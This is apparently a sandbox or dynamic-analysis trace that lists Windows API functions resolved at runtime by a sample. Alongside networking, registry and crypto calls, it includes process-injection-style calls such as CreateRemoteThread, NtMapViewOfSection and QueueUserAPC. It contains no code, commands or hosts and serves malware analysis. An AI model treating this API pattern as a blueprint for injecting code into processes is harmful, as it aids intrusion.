DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
